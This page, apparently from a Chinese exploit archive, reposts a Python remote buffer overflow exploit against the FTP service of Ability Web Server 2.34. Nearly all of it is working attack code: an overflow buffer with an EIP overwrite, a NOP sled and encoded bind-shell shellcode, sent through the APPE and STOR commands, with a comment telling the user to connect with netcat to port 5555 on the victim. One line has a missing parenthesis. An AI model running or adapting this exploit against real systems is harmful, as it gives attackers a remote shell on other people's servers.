首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ability Web Server(ftp) - Remote Buffer Overflow Exploit
来源:vfocus.net 作者:JoKeR_StEx 发布时间:2013-12-16  
#!/usr/bin/python 
#====================================================
# Exploit Title : Ability Web Server(ftp) Remote Buffer Overflow Exploit
# Author : JoKeR_StEx
# Version : 2.34
# <3 Algeria <3  
#====================================================
  
import socket,sys
  
print"[+] Usage : exploit.py <ip> <port(21)> \r\n"
  
junk="A" * 969
nop = "\x90" * 32
eip="\x7C\x83\x69\xF0" # call esp 7C8369F0 kernel32.dll
#Shellcode => windows/shell_bind_tcp LPORT=5555 size=>368
shellcode = ("\xda\xd0\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1\x56\xbf\x9d\x28" 
"\xd0\x22\x83\xee\xfc\x31\x7e\x14\x03\x7e\x89\xca\x25\xde" 
"\x59\x83\xc6\x1f\x99\xf4\x4f\xfa\xa8\x26\x2b\x8e\x98\xf6" 
"\x3f\xc2\x10\x7c\x6d\xf7\xa3\xf0\xba\xf8\x04\xbe\x9c\x37" 
"\x95\x0e\x21\x9b\x55\x10\xdd\xe6\x89\xf2\xdc\x28\xdc\xf3" 
"\x19\x54\x2e\xa1\xf2\x12\x9c\x56\x76\x66\x1c\x56\x58\xec" 
"\x1c\x20\xdd\x33\xe8\x9a\xdc\x63\x40\x90\x97\x9b\xeb\xfe" 
"\x07\x9d\x38\x1d\x7b\xd4\x35\xd6\x0f\xe7\x9f\x26\xef\xd9" 
"\xdf\xe5\xce\xd5\xd2\xf4\x17\xd1\x0c\x83\x63\x21\xb1\x94" 
"\xb7\x5b\x6d\x10\x2a\xfb\xe6\x82\x8e\xfd\x2b\x54\x44\xf1" 
"\x80\x12\x02\x16\x17\xf6\x38\x22\x9c\xf9\xee\xa2\xe6\xdd" 
"\x2a\xee\xbd\x7c\x6a\x4a\x10\x80\x6c\x32\xcd\x24\xe6\xd1" 
"\x1a\x5e\xa5\xbd\xef\x6d\x56\x3e\x67\xe5\x25\x0c\x28\x5d" 
"\xa2\x3c\xa1\x7b\x35\x42\x98\x3c\xa9\xbd\x22\x3d\xe3\x79" 
"\x76\x6d\x9b\xa8\xf6\xe6\x5b\x54\x23\xa8\x0b\xfa\x9b\x09" 
"\xfc\xba\x4b\xe2\x16\x35\xb4\x12\x19\x9f\xc3\x14\xd7\xfb" 
"\x80\xf2\x1a\xfc\x33\xb0\x92\x1a\x51\xa6\xf2\xb5\xcd\x04" 
"\x21\x0e\x6a\x76\x03\x22\x23\xe0\x1b\x2c\xf3\x0f\x9c\x7a" 
"\x50\xa3\x34\xed\x22\xaf\x80\x0c\x35\xfa\xa0\x47\x0e\x6d" 
"\x3a\x36\xdd\x0f\x3b\x13\xb5\xac\xae\xf8\x45\xba\xd2\x56" 
"\x12\xeb\x25\xaf\xf6\x01\x1f\x19\xe4\xdb\xf9\x62\xac\x07" 
"\x3a\x6c\x2d\xc5\x06\x4a\x3d\x13\x86\xd6\x69\xcb\xd1\x80" 
"\xc7\xad\x8b\x62\xb1\x67\x67\x2d\x55\xf1\x4b\xee\x23\xfe" 
"\x81\x98\xcb\x4f\x7c\xdd\xf4\x60\xe8\xe9\x8d\x9c\x88\x16" 
"\x44\x25\xb8\x5c\xc4\x0c\x51\x39\x9d\x0c\x3c\xba\x48\x52" 
"\x39\x39\x78\x2b\xbe\x21\x09\x2e\xfa\xe5\xe2\x42\x93\x83" 
"\x04\xf0\x94\x81");
rest="C" * 627
buffer = junk + eip + nop + shellcode + rest
# Connection 
host = sys.argv[1]
port = sys.argv[2]
dz=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
dz.connect((host,int(port)))
data=dz.recv(1024)
print "[+]" + data
dz.send("USER ftp\r\n")
data=dz.recv(1024)
print"[+]" + data 
dz.send("PASS ftp\r\n")
data=dz.recv(1024)
print"[+]" + data
# Remote Buffer File 
dz.send("APPE" + buffer + "\r\n"
data=dz.recv(1024)
print"[+]" + data
#STOR(save) buffer 
dz.send("STOR" + buffer + "\r\n")
data=dz.recv(1024)
print"[+]" + data
print"[+]"+"Sending Shellcode ..." 
dz.close()
# Cennect To Victim  " nc -nvv <ip victim > 5555
################################################
#The Black Devils ,Team Dz S.O.S
#Sec W0rms 
#L0ve Algeria <3 Security <3 Penetration Testing
################################################

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Castripper 2.50.70 - (.pls) DE
·iScripts AutoHoster PHP Code I
·Cisco Unified Communications M
·PotPlayer 1.5.42509 Beta - DOS
·Divide Error In Windows Kernel
·VUPlayer 2.49 - (.M3U) Univers
·EMC Data Protection Advisor DP
·Adobe Reader ToolButton Use Af
·Adobe ColdFusion 9 Administrat
·Ability Mail Server 2013 (3.1.
·HP LoadRunner EmulationAdmin W
·Nvidia (nvsvc) Display Driver
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved